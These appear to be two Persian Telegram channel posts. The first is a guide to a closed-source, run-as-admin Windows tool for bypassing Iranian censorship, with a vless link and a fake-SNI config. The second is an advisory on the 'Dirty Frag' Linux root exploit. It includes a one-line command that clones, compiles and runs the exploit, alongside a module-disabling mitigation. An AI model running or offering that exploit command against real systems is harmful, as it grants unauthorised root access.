💻 اتصال پرسرعت به کانفیگ با سرور فعال، فعلا نیاز به ویندوز (نیاز به کمی تسلط)

🔴این نرم افزار توسط یکی از فعالان حوزه اینترنت آزاد توسعه داده شده ولی closed source هست و با مسئولیت خودتون استفاده کنید.

✔️برای راه اندازیش یه ویندوز لازمه ولی میتونید به همه دستگاه های متصل به اون wifi اینترنت آزاد بدید.

1️⃣نیاز به یه کانفیگ فعال داره (ترجیحا کلودفلر برای راحتی)

🟢اشتراک های رایگان میتونن از کانفیگ Finland🇫🇮#111 استفاده کنن؛ اشتراک های پریمیوم از کانفیگ VIP🇫🇮#3؛ اگه اشتراک رایگان ندارید میتونید از مینی اپ بگیرید.


2️⃣نیاز به یه آی پی و دومین داریم که وایت شده باشه. الان اونی که توی فایل config.json هست کار میکنه ولی سایت های پشت کلود که باز شدن رو میتونید توی CMD پینگ بگیرید، خودشو IPشو بذارید توی فایل config.json

3️⃣ فایل exe رو run as admin کنید.

4️⃣حالا باید کانفیگ توی v2rayN رو تغییر بدیم به این صورت که توی قسمت آدرس 127.0.0.1 رو میذاریم و توی قسمت port 40443 و تمام، با سرعت عالی میتونید متصل بشید.

⚠️ کانفیگ های من دو بخش داره، بخش xhttp mode توی v2rayN، اون سه نقطه رو بزنید و Address و Port اونجا رو هم ادیت کنید یا کامل پاکش کنید.

🍏 🤖 برای اینکه بقیه دستگاه های توی اون شبکه هم بتونن وصل بشن، توی cmd ویندوز ipconfig رو بزنید تا ipv4 لوکال ویندوز رو پیدا کنید، قسمت Address کانفیگ توی گوشی، اون IP رو وارد کنید و port هم همون 40443

🔖 باید ip و domain توی فایل config.json براتون پینگ بده، توی cmd امتحان کنید.

💵در آخر اگه میتونید دونیت به توسعه دهنده رو در نظر بگیرید.

لینک دانلود داخلی

@Baraye_Azadi_info

🟢کانفیگ ادیت شده برای ویندوز (حجم 1 ترابایت):

vless://80c0f29f-850e-4044-a4ee-0b0697d8ca26@127.0.0.1:40443?encryption=none&security=tls&sni=dl1.speedysho.com.&fp=chrome&insecure=0&allowInsecure=0&type=xhttp&host=dl1.speedysho.com&path=dl%3Fed%3D2560&mode=auto&extra=%7B%22downloadSettings%22%3A%7B%22address%22%3A%22127.0.0.1%22%2C%22port%22%3A40443%2C%22network%22%3A%22xhttp%22%2C%22security%22%3A%22tls%22%2C%22tlsSettings%22%3A%7B%22serverName%22%3A%22up1.speedysho.com%22%2C%22fingerprint%22%3A%22chrome%22%7D%2C%22xhttpSettings%22%3A%7B%22path%22%3A%22%2Fdl%3Fed%3D2560%22%2C%22host%22%3A%22up1.speedysho.com%22%2C%22mode%22%3A%22auto%22%7D%7D%7D#%E2%9A%AB%EF%B8%8FBaraye_azadi_bot

🟢فایل config.json که خودم دارم استفاده میکنم:

{
  "LISTEN_HOST": "0.0.0.0",
  "LISTEN_PORT": 40443,
  "CONNECT_IP": "104.18.4.130",
  "CONNECT_PORT": 443,
  "FAKE_SNI": "security.vercel.com"
}

بازهم آسیب‌پذیری تمام لینوکس‌ها از ۲۰۱۷: Dirty Frag

آسیب‌پذیری تازه‌ای در ادامه‌ی Dirty Pipe و Copy Fail پیدا شده، که با ترکیب دو باگ امنیتی (xfrm-ESP و RxRPC در Page Cache) در بسیاری از توزیع‌ها می‌تونه دسترسی root بگیره.

می‌تونید روی سیستم خودتون هم امتحانش کنید:

git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

پس از اینکه انجامش دادید، Page Cache شما آلوده شده با اجرای دستور:

echo 3 > /proc/sys/vm/drop_caches

یا ری‌استارت کردن سیستم به حالت پیش برگردونیدش.

راهکار:
تا پچ امنیتی برای توزیعتون بیاد می‌تونید با این دستور ماژولهایی که این آسیب‌پذیری در اونها وجود داره را غیرفعال کنید و Page cache را پاک کنید:

sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"

روی این سیستم‌ها تا الان تست شده و آسیب‌پذیر بودند:

Ubuntu 24.04.4: 6.17.0-23-generic
RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
openSUSE Tumbleweed: 7.0.2-1-default
CentOS Stream 10: 6.12.0-224.el10.x86_64
AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
Fedora 44: 6.19.14-300.fc44.x86_64

اگه شبیه CopyFail به نظر میاد خودشون گفتن که:

ایده شروع این تحقیق از آسیب‌پذیری Copy Fail گرفته شده. به‌طور مشخص، بخش xfrm-ESP در زنجیره آسیب‌پذیری Dirty Frag از همان نقطه ضعف مشابه Copy Fail استفاده می‌کند. اما تفاوت مهم این است که این آسیب‌پذیری مستقل از وجود ماژول algif_aead فعال می‌شود.

به عبارت دیگر، حتی اگر روی سیستم راهکار شناخته‌شده مقابله با Copy Fail (مثل غیرفعال کردن algif_aead) اعمال شده باشد، باز هم لینوکس شما در برابر Dirty Frag آسیب‌پذیر باقی می‌ماند.

⌨️ توضیحات بیشتر در گیت‌هاب

تمام این اتفاق‌ها داره در زمانی میوفته که اینترنت ایران همچنان قطعه، سیستم‌ها به روز نشدند، با خبر شدن از این باگ‌ها و برطرف کردنشون به مراتب سخت‌تر خواهد بود.

✈️ به این لیست (از کانال سهراب) Dirty Frag را هم اضافه کنید.


🎮 @gooyban